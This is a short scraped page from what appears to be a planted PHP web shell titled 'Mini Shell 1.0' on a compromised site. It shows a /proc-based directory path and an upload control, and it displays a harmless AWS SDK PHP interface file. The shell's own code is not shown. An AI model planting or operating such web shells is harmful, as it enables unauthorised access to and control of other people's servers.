HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/1784574/task/1784574/cwd/vendor/aws/aws-sdk-php/src/Arn/S3/
Upload File :
Current File : //proc/1784574/task/1784574/cwd/vendor/aws/aws-sdk-php/src/Arn/S3/OutpostsArnInterface.php
<?php
namespace Aws\Arn\S3;

use Aws\Arn\ArnInterface;

/**
 * @internal
 */
interface OutpostsArnInterface extends ArnInterface
{
    public function getOutpostId();
}